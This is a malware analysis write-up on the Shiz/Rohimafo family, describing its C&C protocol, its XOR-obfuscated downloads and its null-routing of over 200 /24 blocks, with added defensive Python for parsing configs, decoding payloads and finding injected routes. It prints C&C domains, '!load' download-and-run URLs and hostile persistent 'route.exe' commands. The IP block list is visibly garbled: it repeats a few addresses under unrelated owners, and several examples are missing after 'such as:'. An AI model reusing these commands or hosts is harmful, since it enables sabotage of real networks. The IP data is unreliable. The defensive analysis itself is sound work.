Shiz and Rohimafo: Malware Cousins
Over the course of the last few weeks, our malware sandboxes have analyzed several interesting specimens whose malicious activity includes making significant modifications to the routing table on the victim host; the effect of these changes is essentially to null-route a large number of /24 IP blocks, one of which is assigned to the U.S. Department of Justice.
As usual, the malicious activity begins with the running of an initial dropper executable. This dropper immediately copies itself verbatim into the Windows system directory with an (apparently) randomly generated new file name; examples include 5b8388e0.exe, 593a1edf.exe, and d4f11d84.exe.
The malware then adds an entry to the following Registry key to ensure that the installed version of itself is launched each time the machine restarts:
It then launches the installed copy of itself and exits; as usual, this second process deletes the original sample from the file system. The dropped malware then injects code into an svchost.exe process and makes an initial network connection to its C&C server. This connection consists of an HTTP GET request to a PHP script with two parameters, such as:
We have always observed the same DWORD value for the first parameter, but have seen at least six different values for the “seller ID” string, including:
seller-01
seller-15
seller-23
seller-25
seller-28
and even, in some dropper samples analyzed back in May 2010:
It is noteworthy that there is no User-Agent provided in this request; in fact, the only HTTP header field present at all is the “Host:” field.
The response from the C&C server included headers that indicated it was powered by Apache/2 with PHP version 5.2.13. The response consists of a short configuration file in plain text; a representative example is below:
!config
borgherres.com
biologyfozzie.com
b1642ckt.com
7200
!load
!68 http://blachowicz.com/ipybnknatrcsae.php?id=1&magic=280736572
7200
In some cases, but not always, the first domain name in the “!config” section is the same as the C&C domain.
The “!load” section contains a URL to download and execute. In our observations, this URL always contains a randomly-named PHP script with two parameters: an “id” parameter that is always set to 1, and a “magic” parameter that contains a (seemingly) random 9-digit number. Other representative examples of load commands include:
!load !67 http://b00ger01.com/zt6bgzqn6ww7mz0.php?id=1&magic=866125628
!load !66 http://b0000c454d.com/Hl5OjvG4dRIqx2Y.php?id=1&magic=302293400
The meaning of the numerical “7200” values is not known; perhaps it indicates the number of seconds to wait before checking in with the C&C server again. We have also observed the value 4500 instead of 7200 in some cases.
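To turn responses of this shape into something a defender can act on (hostnames for blocklists and DNS hunting, the revision tag, the “magic” value), the following added parser is offered here; it is not code from the original post or from the malware authors. It works on whitespace-separated tokens, because the exact line breaks of the real response are not known, and it also accepts the scheme-less URL form of the “!new_config” response shown further down the page. The sample responses below are constructed from the examples quoted in the text.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample modelled on the C&C response quoted on the page; the
# exact line breaks of the real response are not known, so the parser works
# on whitespace-separated tokens and does not depend on them.
SAMPLE_RESPONSE = """
!config
borgherres.com
biologyfozzie.com
b1642ckt.com
7200
!load
!68 http://blachowicz.com/ipybnknatrcsae.php?id=1&magic=280736572
7200
"""

# Constructed from the second C&C's "!new_config" example on the page.
SAMPLE_NEW_CONFIG = "!new_config besprutaness.com buffeter.com bjerkeseth.com/iOsVnczZv5NIYH8.php"

REVISION_RE = re.compile(r"^!(\d+)$")   # "!68": revision tag preceding a load URL
INTERVAL_RE = re.compile(r"^\d+$")      # bare number: probable check-in interval


def host_of(url):
    """Hostname of a URL, tolerating the scheme-less form seen in !new_config."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url).hostname


def parse_cnc_response(text):
    """Split a Shiz-style response into sections keyed by their '!name' header."""
    result = {"config": [], "new_config": [], "load": [], "intervals": []}
    section = None
    revision = None
    for tok in text.split():
        m = REVISION_RE.match(tok)
        if m:
            revision = int(m.group(1))          # "!68" -> 68, applies to the next URL
        elif tok.startswith("!"):
            section = tok[1:]                   # "!config", "!load", "!new_config"
            revision = None
        elif INTERVAL_RE.match(tok):
            result["intervals"].append(int(tok))
        elif section == "load":
            query = parse_qs(urlsplit(tok).query)
            result["load"].append({
                "revision": revision,
                "url": tok,
                "host": host_of(tok),
                "magic": query.get("magic", [None])[0],
            })
            revision = None
        elif section is not None:
            result.setdefault(section, []).append(tok)
    return result


def extract_hosts(parsed):
    """Every hostname the response points the bot at, sorted, for blocklists."""
    hosts = set()
    for entry in parsed["config"] + parsed["new_config"]:
        hosts.add(host_of(entry))
    for load in parsed["load"]:
        hosts.add(load["host"])
    return sorted(hosts)


if __name__ == "__main__":
    for text in (SAMPLE_RESPONSE, SAMPLE_NEW_CONFIG):
        parsed = parse_cnc_response(text)
        print(extract_hosts(parsed), parsed["load"], parsed["intervals"])
```

The bare numbers are kept as “intervals” without assigning them a meaning, matching the uncertainty stated above; the revision tag is attached to whichever URL follows it, so a response carrying several “!load” commands yields one entry per command.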
Upon receipt of the load command, the malware makes another HTTP GET request to the first C&C listed in the aforementioned “!config” section. This is often the same C&C it initially contacted, but sometimes it sends its acknowledgment to a different C&C hostname specified in the “!config”; again, only a single “Host:” HTTP header is included in this request. The response headers from the download server also indicate that it runs the same web server software as the initial C&C: Apache/2 with PHP 5.2.13.
Although the response header from the download server indicates that the downloaded content is HTML, in actuality it is a large (100KB or more) block of raw binary data. As it turns out, the downloaded data is really a new executable file that has been weakly obfuscated by XORing against the DWORD 0xA0A0A0A0. After the download completes, the malware sends an acknowledgment message to the C&C; this acknowledgment consists of another HTTP GET request to the original URL, but with a third GET parameter appended indicating that the “!load” command succeeded:
Note that the request value of “68” was included within the load command as “!68”. Over the course of several days, we have observed the values of this number slowly increment from 66, to 67, to 68; this suggests it could be a revision number of some kind. The C&C sends an HTTP response to this acknowledgment containing headers but no bytes of content.
Once the downloaded data is written to the file system, it is XORed against 0xA0A0A0A0 to return it to its original executable form, and then executed. The file name used is generated according to a pattern exemplified by the following representative samples:
C:\WINDOWS\TEMP\ntE808.tmp.exe
C:\WINDOWS\TEMP\ntA2EC.tmp.exe
C:\WINDOWS\TEMP\ntEBEB.tmp.exe
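For analysts who capture the “HTML” download body from a sandbox or packet capture, the following added helper (not code from the original post) undoes the 0xA0A0A0A0 XOR described above and refuses to return anything that does not carry an MZ/PE header, which guards against applying the key to the wrong response. The stub PE image and the on-wire blob built from it are constructed here for illustration; the file names in the usage line are assumptions.

```python
import struct
import sys

XOR_KEY = 0xA0A0A0A0  # the DWORD the page reports the payload is XORed against


def xor_dword(data: bytes, key: int = XOR_KEY) -> bytes:
    """XOR data against a repeating 4-byte key (little-endian byte order).

    XOR is its own inverse, so the same call obfuscates and de-obfuscates.
    For 0xA0A0A0A0 every key byte is identical, so byte order and a trailing
    partial DWORD make no difference; the general case is handled anyway.
    """
    key_bytes = struct.pack("<I", key)
    return bytes(b ^ key_bytes[i % 4] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check: MZ signature and e_lfanew pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decode_payload(blob: bytes) -> bytes:
    """Recover the executable; refuse to hand back bytes that are not a PE."""
    decoded = xor_dword(blob)
    if not looks_like_pe(decoded):
        raise ValueError("decoded data has no MZ/PE header: wrong key, or not this family")
    return decoded


def build_sample_pe_stub() -> bytes:
    """Constructed stand-in for a PE image: MZ header whose e_lfanew points at 'PE\\0\\0'."""
    stub = bytearray(b"MZ" + b"\0" * 0x3E)        # 0x40-byte DOS header
    struct.pack_into("<I", stub, 0x3C, 0x40)      # e_lfanew = 0x40
    stub += b"PE\0\0" + b"\0" * 20                # NT signature plus filler
    return bytes(stub)


# What the download body would look like on the wire for the stub above (constructed).
SAMPLE_BLOB = xor_dword(build_sample_pe_stub())


if __name__ == "__main__":
    # Usage (file names assumed): python dexor.py <downloaded.bin> <out.exe>
    # With no arguments the constructed sample blob is decoded instead.
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            blob = f.read()
    else:
        blob = SAMPLE_BLOB
    exe = decode_payload(blob)
    if len(sys.argv) == 3:
        with open(sys.argv[2], "wb") as f:
            f.write(exe)
    print(f"decoded {len(exe)} bytes; on the wire: {blob[:2].hex()}, decoded: {exe[:2]!r}")
```

Because every byte of the key is 0xA0, the “MZ” signature appears on the wire as the bytes ED FA, which is a quick way to recognize a payload of this family in a capture before decoding it.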
Once executed, the dropped malware moves itself from C:\Windows\TEMP to C:\Windows\System32 under a randomly generated new file name, such as:
uwlfoh.exe
xnkhpi.exe
eiqchz.exe
It then restarts itself and begins making permanent modifications to the victim computer’s routing table in order to block access to a list of 205 separate /24 IP blocks. The list of IP blocks it null-routes is embedded (in obfuscated form) in the downloaded executable; although a strings analysis of the static binary yielded no IP addresses, a memory dump of the executing process contained a list of 205 ASCII strings corresponding to the IP blocks to be null-routed.
The malware proceeds down this list and invokes the Windows route.exe command twice for each IP block:
route.exe -p add 126.96.36.199 mask 255.255.255.0 172.XX.YY.0
route.exe -p add 188.8.131.52 mask 255.255.255.0 0.0.0.255
In our experiments on a Windows XP box, the second route.exe command fails because the specified gateway (0.0.0.255) is invalid, but the first route.exe command succeeds and has the effect of null-routing the target IP block (184.108.40.206/24 in this case, assigned to UC Santa Barbara), since no host with IP address 172.XX.YY.0 exists. Note that the form of the non-existent gateway appears to be generated dynamically from the IP of the victim machine (which, in the above case, had an RFC 1918 address of 172.XX.YY.ZZ).
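Because the routes are added with -p, they survive reboots and are the most durable artifact this component leaves behind, so a responder wants a way to find and remove them. The following added example (not code from the original post) parses the “Persistent Routes” section of `route print -4` output and flags /24 entries whose gateway can never forward traffic: the invalid 0.0.0.255, a subnet’s network address (the .0 form described above), or an address on no local subnet. It then emits the matching `route.exe delete` commands for review. The route table excerpt and the host’s own /24 are constructed for illustration and use documentation address ranges rather than the blocks from the page.

```python
import ipaddress
import re

# Constructed excerpt of the "Persistent Routes" section of `route print -4`
# from a host with address 172.16.5.23/24; destinations are documentation
# ranges, not the blocks listed on the page.
SAMPLE_ROUTE_PRINT = """\
Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
          0.0.0.0          0.0.0.0      172.16.5.1  Default
      203.0.113.0    255.255.255.0      172.16.5.0       1
     198.51.100.0    255.255.255.0       0.0.0.255       1
        192.0.2.0    255.255.255.0      172.16.5.1       1
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
ROUTE_RE = re.compile(rf"^\s*{IPV4}\s+{IPV4}\s+{IPV4}\s+(\S+)\s*$")


def parse_persistent_routes(text):
    """Return (destination, netmask, gateway, metric) tuples from the persistent-routes section."""
    routes, in_section = [], False
    for line in text.splitlines():
        if line.startswith("Persistent Routes"):
            in_section = True
            continue
        if not in_section:
            continue
        m = ROUTE_RE.match(line)
        if m:
            routes.append(m.groups())
    return routes


def is_blackhole_gateway(gateway, local_networks):
    """True if no host can answer for this next hop: 0.0.0.255, the network
    address (.0) of a local subnet, or an address that lies on no local subnet."""
    gw = ipaddress.ip_address(gateway)
    if gw == ipaddress.ip_address("0.0.0.255"):
        return True
    return not any(gw in net and gw != net.network_address for net in local_networks)


def find_blackhole_routes(text, local_networks):
    """Persistent non-default routes whose gateway is unreachable by construction."""
    nets = [ipaddress.ip_network(n, strict=False) for n in local_networks]
    flagged = []
    for dest, mask, gw, _metric in parse_persistent_routes(text):
        if dest == "0.0.0.0":
            continue  # default route, judged separately
        if is_blackhole_gateway(gw, nets):
            flagged.append((dest, mask, gw))
    return flagged


def remediation_commands(flagged):
    """route.exe invocations that remove the offending persistent entries."""
    return [f"route.exe delete {dest} mask {mask} {gw}" for dest, mask, gw in flagged]


if __name__ == "__main__":
    hits = find_blackhole_routes(SAMPLE_ROUTE_PRINT, ["172.16.5.23/24"])
    for cmd in remediation_commands(hits):
        print(cmd)
```

On a real host the local subnet would be taken from `ipconfig`, and a count of flagged routes in the hundreds is itself a strong indicator, since legitimate administration rarely installs that many persistent host-specific routes; the commands are printed rather than executed so the list can be reviewed first.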
The complete list of IP blocks that the malware attempts to null-route, along with their associated network names and country codes, is as follows:
AT 220.127.116.11 TECHNISCHE UNIVERSITAT WIEN
AT 18.104.22.168 TECHNISCHE UNIVERSITAT WIEN
BY 22.214.171.124 TUT.BY
CH 126.96.36.199 NINE INTERNET SOLUTIONS AG SWITZERLAND
CZ 188.8.131.52 TARIO OF NEW YORK
CZ 184.108.40.206 COLGATE-PALMOLIVE CESKA REPUBLIKA SPOL. S R.O
CZ 220.127.116.11 NETCENTRUM
DE 18.104.22.168 NETWORK ADDRESS
DE 22.214.171.124 INFRASTRUCTURE
DE 126.96.36.199 INSOFT EDV-SYSTEME GMBH BERLIN
DE 188.8.131.52 CABLE & WIRELESS TELECOMMUNICATION SERVICES GMBH
DE 184.108.40.206 NTT/VERIO EUROPE
DE 220.127.116.11 AVIRA GMBH
DE 18.104.22.168 SKYLIME GBR
DE 22.214.171.124 GRID-SERVICE-GMBH
DE 126.96.36.199 VSERVER - VIRTUAL DEDICATED SERVER-HOSTING
DE 188.8.131.52 SERVER4YOU DEDICATED SERVER HOSTING
DE 184.108.40.206 HETZNER ONLINE AG
DE 220.127.116.11 DEUTSCHE TELEKOM AG
DE 18.104.22.168 HOLTZBRINCK ONLINE SERVICES GMBH
DE 22.214.171.124 AVIRA GMBH
DE 126.96.36.199 HOSTEUROPE GMBH
DE 188.8.131.52 AIXTRANET HERZOGENRATH
DE 184.108.40.206 1&1 INTERNET AG
DE 220.127.116.11 SEDO DOMAIN PARKING
DE 18.104.22.168 STRATO RECHENZENTRUM BERLIN
DE 22.214.171.124 ELEMENT5 AG - A DIGITALRIVER COMPANY
DE 126.96.36.199 1&1 INTERNET AG
DE 188.8.131.52 1&1 INTERNET AG
DE 184.108.40.206 HOSTEUROPE GMBH
EE 220.127.116.11 DIAPOL GRANITE OY
EE 18.104.22.168 MODERA CONSULTING O
ES 22.214.171.124 DIRECCION GENERAL DE TRAFICO
ES 126.96.36.199 GIPUZKOA EMPLOYERS ASSOCIATION
ES 188.8.131.52 IP ADDRESSES FOR JAZZTELBONE CLIENTS
FI 184.108.40.206 F-SECURE OYJ
FI 220.127.116.11 F-SECURE
FR 18.104.22.168 NORDNET SA
FR 22.214.171.124 NORDNET
FR 126.96.36.199 MFX-BORDEAUX
FR 188.8.131.52 FRANCE TELECOM
FR 184.108.40.206 RDMEDIAS
FR 220.127.116.11 OVH SAS
FR 18.104.22.168 OVH SAS
GR 22.214.171.124 FOUNDATION OF RESEARCH AND TECHNOLOGY HELLAS
HU 126.96.36.199 INTERWARE INC
IE 188.8.131.52 NETWORK FOR FTP.HEANET.IE SERVICES
IE 184.108.40.206 LETSHOST
IE 220.127.116.11 AMAZON WEB SERVICES ELASTIC COMPUTE CLOUD EC2 EU
IL 18.104.22.168 ELRON TECHNOLOGIES
IS 22.214.171.124 FRIDRIK SKULASON HF
JP 126.96.36.199 JAPAN NETWORK INFORMATION CENTER
NL 188.8.131.52 IP-EEND
NL 184.108.40.206 XS4ALL INTERNET BV
NL 220.127.116.11 IS INTERNED SERVICES
NL 18.104.22.168 KDIS
NL 22.214.171.124 EUROACCESS
NL 126.96.36.199 LEASEWEB
NO 188.8.131.52 NORMAN DATA DEFENCE SYSTEMS AS LYSAKER
NO 184.108.40.206 NORMAN DATA DEFENCE SYSTEMS AS LYSAKER
NO 220.127.116.11 LINPRO AS
PH 18.104.22.168 PHILIPPINE TELEGRAPH AND TELEPHONE CORPORATION
RO 22.214.171.124 INFRA-AW
RU 126.96.36.199 PETERSBURG INTERNET NETWORK LLC
RU 188.8.131.52 IO-HOSTS LTD
RU 184.108.40.206 MASTAK-TELECOM
RU 220.127.116.11 MASTERHOST.RU IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU 18.104.22.168 HTTP://WWW.NIKAMOTORS.RU
RU 22.214.171.124 KASPERSKY LAB
RU 126.96.36.199 CHRONOPAY B.V
RU 188.8.131.52 SAINT-PETERSBURG DEPARTMENT MAJORDOMO LLC
RU 184.108.40.206 KASPERSKY LABS
RU 220.127.116.11 RTCOMM.RU NETWORK
RU 18.104.22.168 RTCOMM.RU NETWORK
RU 22.214.171.124 ESERVER.RU - HOSTING OPERATOR
RU 126.96.36.199 JSC CENTRAL TELECOMMUNICATION COMPANY BRANCH BELSVYAZ
RU 188.8.131.52 CORBINA TELECOM
RU 184.108.40.206 .MASTERHOST
RU 220.127.116.11 MASTERHOST VPS SERVICES
RU 18.104.22.168 MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU 22.214.171.124 MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU 126.96.36.199 MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU 188.8.131.52 MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU 184.108.40.206 AGAVA JSC
RU 220.127.116.11 GARANT-PARK-TELECOM LTD
RU 18.104.22.168 MASTERHOST VPS SERVICES
RU 22.214.171.124 TW NETWORK SOLUTION
RU 126.96.36.199 COLOCATION SERVICES
SK 188.8.131.52 VNET A.S
UA 184.108.40.206 LUCKY NET (COLLOCATION)
UA 220.127.116.11 FREEHOST UA
UA 18.104.22.168 HOSTPRO LTD
UA 22.214.171.124 ELEKTRONNI VISTI LTD (ELVISTI LTD) KYIV UKRAINE
UA 126.96.36.199 VELTON.TELECOM GPON K12 NETWORK
UK 188.8.131.52 EUROPEAN REGIONAL REGISTRY
UK 184.108.40.206 LEVEL 3 COMMUNICATIONS
UK 220.127.116.11 UK'S LARGEST WEB HOSTING COMPANY
UK 18.104.22.168 SOPHOS
UK 22.214.171.124 APPENSE
UK 126.96.36.199 UK NOC
UK 188.8.131.52 AKAMAI TECHNOLOGIES
UK 184.108.40.206 INTEROUTE COMMUNICATIONS LIMITED
UK 220.127.116.11 COMODO CA LTD
UK 18.104.22.168 COMODO CA LTD
UK 22.214.171.124 AKAMAI TECHNOLOGIES
UK 126.96.36.199 NET MEDIA PLANET IP SPACE
UK 188.8.131.52 LIMELIGHT NETWORKS INC
US 184.108.40.206 UNIVERSITY OF CALIFORNIA SANTA BARBARA
US 220.127.116.11 COMPUTER ASSOCIATES INTERNATIONAL
US 18.104.22.168 US DEPT OF JUSTICE
US 22.214.171.124 COMPUTER ASSOCIATES INTERNATIONAL
US 126.96.36.199 SUSQUEHANNA FIRE
US 188.8.131.52 CORPORATION SERVICE COMPANY
US 184.108.40.206 XMISSION L.C
US 220.127.116.11 THEPLANET.COM INTERNET SERVICES INC
US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC
US 22.214.171.124 THEPLANET.COM INTERNET SERVICES INC
US 126.96.36.199 THEPLANET.COM INTERNET SERVICES INC
US 188.8.131.52 MASSACHUSETTS INSTITUTE OF TECHNOLOGY
US 184.108.40.206 SYMANTEC CORPORATION
US 220.127.116.11 FLUID HOSTING LLC
US 18.104.22.168 NETWORK SOLUTIONS LLC
US 22.214.171.124 LEVEL 3 COMMUNICATIONS INC
US 126.96.36.199 CONXION CORPORATION
US 188.8.131.52 THEPLANET.COM INTERNET SERVICES INC
US 184.108.40.206 THEPLANET.COM INTERNET SERVICES INC
US 220.127.116.11 MICROSOFT CORP
US 18.104.22.168 MICROSOFT CORP
US 22.214.171.124 MICROSOFT CORP
US 126.96.36.199 LEGISLATIVE COUNCIL SERVICE
US 188.8.131.52 SOFTLAYER TECHNOLOGIES INC
US 184.108.40.206 SOFTLAYER TECHNOLOGIES INC
US 220.127.116.11 DIGITAL RIVER INC
US 18.104.22.168 INTERALAB
US 22.214.171.124 NTT AMERICA INC
US 126.96.36.199 HOPONE INTERNET CORPORATION
US 188.8.131.52 WCP/32POINTS INTERMEDIATE HOLDING COMPANY INC
US 184.108.40.206 BLACKMESH INC
US 220.127.116.11 THEPLANET.COM INTERNET SERVICES INC
US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC
US 22.214.171.124 CHECK POINT SOFTWARE TECHNOLOGIES INC
US 126.96.36.199 SYMANTEC CORPORATION
US 188.8.131.52 SERVERVAULT CORP
US 184.108.40.206 CNET NETWORKS INC
US 220.127.116.11 HOSTFORWEB INC
US 18.104.22.168 MCAFEE INC
US 22.214.171.124 MCAFEE INC
US 126.96.36.199 CODERO
US 188.8.131.52 TREND MICRO INCORPORATED
US 184.108.40.206 PSINET INC
US 220.127.116.11 WS/AKAMAI TECHNOLOGIES/AKAMAI TECHNOLOGIES
US 18.104.22.168 TW TELECOM HOLDINGS INC
US 22.214.171.124 TITAN NETWORKS
US 126.96.36.199 GODADDY.COM INC
US 188.8.131.52 THEPLANET.COM INTERNET SERVICES INC
US 184.108.40.206 JUSTIA INC
US 220.127.116.11 MCAFEE INC
US 18.104.22.168 HOSTWAY CORPORATION
US 22.214.171.124 VIAWEST
US 126.96.36.199 FREEZE FRAME GRAPHICS
US 188.8.131.52 MICROSOFT CORP
US 184.108.40.206 MICROSOFT CORP
US 220.127.116.11 PEER 1 DEDICATED HOSTING
US 18.104.22.168 NAME INTELLIGENCE INC
US 22.214.171.124 QCC QWEST
US 126.96.36.199 NATIONAL EDUCATION ASSOCIATION
US 188.8.131.52 OUR INTERNET INC
US 184.108.40.206 SLY.TV
US 220.127.116.11 THEPLANET.COM INTERNET SERVICES INC
US 18.104.22.168 ROUNDHOUSE LLC
US 22.214.171.124 LIQUID WEB INC
US 126.96.36.199 LIQUID WEB INC
US 188.8.131.52 SOURCEFIRE INC
US 184.108.40.206 LIMESTONE NETWORKS INC
US 220.127.116.11 INVISION.COM INC
US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC
US 22.214.171.124 THEPLANET.COM INTERNET SERVICES INC
US 126.96.36.199 THEPLANET.COM INTERNET SERVICES INC
US 188.8.131.52 LAYERED TECHNOLOGIES INC
US 184.108.40.206 RACKSPACE HOSTING
US 220.127.116.11 RACKSPACE HOSTING
US 18.104.22.168 BEORRATECH
US 22.214.171.124 RACKSPACE HOSTING
US 126.96.36.199 GOOGLE INC
US 188.8.131.52 1&1 INTERNET INC
US 184.108.40.206 1&1 INTERNET INC
US 220.127.116.11 LUNAR PAGES
US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC
US 22.214.171.124 THEPLANET.COM INTERNET SERVICES INC
US 126.96.36.199 THEPLANET.COM INTERNET SERVICES INC
US 188.8.131.52 THEPLANET.COM INTERNET SERVICES INC
US 184.108.40.206 THEPLANET.COM INTERNET SERVICES INC
US 220.127.116.11 THEPLANET.COM INTERNET SERVICES INC
US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC
US 22.214.171.124 THEPLANET.COM INTERNET SERVICES INC
US 126.96.36.199 THEPLANET.COM INTERNET SERVICES INC
US 188.8.131.52 SOFTLAYER TECHNOLOGIES INC
US 184.108.40.206 CLIENT INTELLECT INC
US 220.127.116.11 THEPLANET.COM INTERNET SERVICES INC
US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC
US 22.214.171.124 THEPLANET.COM INTERNET SERVICES INC
US 126.96.36.199 THEPLANET.COM INTERNET SERVICES INC
US 188.8.131.52 THEPLANET.COM INTERNET SERVICES INC
US 184.108.40.206 THEPLANET.COM INTERNET SERVICES INC
US 220.127.116.11 HOSTWAY TPA FL
Upon completion of the null-routing tasks, the malware connects to a new C&C and submits an HTTP GET request to a URL such as:
Note the use of a “knok.php” script instead of the “knock.php” used for the initial C&C. Note also that the malware submits the name of the victim computer (VICTIM) along with information about the operating system and service pack status.
This second C&C responds with another configuration-like file, such as:
!new_config besprutaness.com buffeter.com bjerkeseth.com/iOsVnczZv5NIYH8.php
This response prompts the malware to download yet another file from the specified PHP script; the downloaded file is (again) a new executable that has been obfuscated by XORing against 0xA0A0A0A0, and is saved to the following location:
This download server was running slightly older software versions (Apache and PHP 5.2.12, instead of the Apache/2 and PHP 5.2.13 seen above).
The malware also injects code into various processes, including EXPLORER.EXE and IEXPLORE.EXE; we have studied neither the behavior nor purpose of this injected code.
Finally, the malware opens up a listening socket on TCP port 14336, and then informs the C&C by sending a final HTTP request to a URL such as:
We have not verified this via reverse engineering, but it seems reasonable to assume that the intention of the opened port might be to serve as a SOCKS proxy.
The dropped malware uses the following mutex to prevent multiple copies of itself from running simultaneously:
Virus detection coverage for the original droppers, as compiled by VirusTotal.com, ranged from 34% to 68% at the time of our analysis, but has improved significantly in the last couple of weeks. Typical detections include:
Backdoor/Win32.Shiz.gen (Antiy-AVL)
Backdoor.Win32.Shiz!IK (Emsisoft)
W32/Shiz!tr.bdr (Fortinet)
Backdoor.Win32.Shiz (Ikarus)
Backdoor.Win32.Shiz.gen (Kaspersky)
Backdoor.Shiz.JJ (VirusBuster)
Trojan:Win32/Meredrop (Microsoft)
W32/Meredrop.FK (Norman)
As far as the dropped (null-routing) malware is concerned, virus detection coverage was not great (about 15%) around the time the sample was first studied, but has since improved over the last few weeks in many cases.
Based on these detections, we have begun using the moniker “Shiz” internally for this family. MD5 hashes and file sizes for the initial dropper samples we’ve seen include:
64ed993299dc40da0822272fd600cf78 (34,816 bytes)
bb9449e02df8d67a6e2e3a60d8f317b6 (40,448 bytes)
527ad0b6464631ff1dc07b5f282c0d7d (38,400 bytes)
MD5 hashes (after de-XORing) and file sizes for the dropped null-routing malware include:
aa66aea4c2cbc9de17e213d334131699 (130,560 bytes)
3f6cedccf1d37de2b9957c06437017f7 (105,984 bytes)
56ee94a95ab2ecb41be357f414de533c (107,520 bytes)
Based on our observations, the C&C servers for this family tend to be hosted in Kazakhstan and Ukraine, and the download servers (where the null-routing malware component lives) are hosted in Russia.
By most counts, the behavior of Shiz is very similar to that of another malware family known as Rohimafo, and described in detail here.
The similarities include the following:
- The knock.php/knok.php URLs for connecting to the C&C;
- The null-routing of over 200 /24 IP blocks;
- The opening of a listening socket (probably a SOCKS proxy);
- The injection of code into EXPLORER.EXE and IEXPLORE.EXE;
- Similar modifications to the Registry.
In fact, the 205 IP blocks null-routed by our Shiz samples include the identical 201 blocks null-routed by Rohimafo, plus the following four additions:
EE 18.104.22.168 DIAPOL GRANITE OY
RU 22.214.171.124 IO-HOSTS LTD
RU 126.96.36.199 KASPERSKY LABS
US 188.8.131.52 THEPLANET.COM INTERNET SERVICES INC
Based on these similarities, we have concluded that either Shiz and Rohimafo are essentially the same family of malware, or at the very least that Shiz is a very close descendant and/or variant of Rohimafo.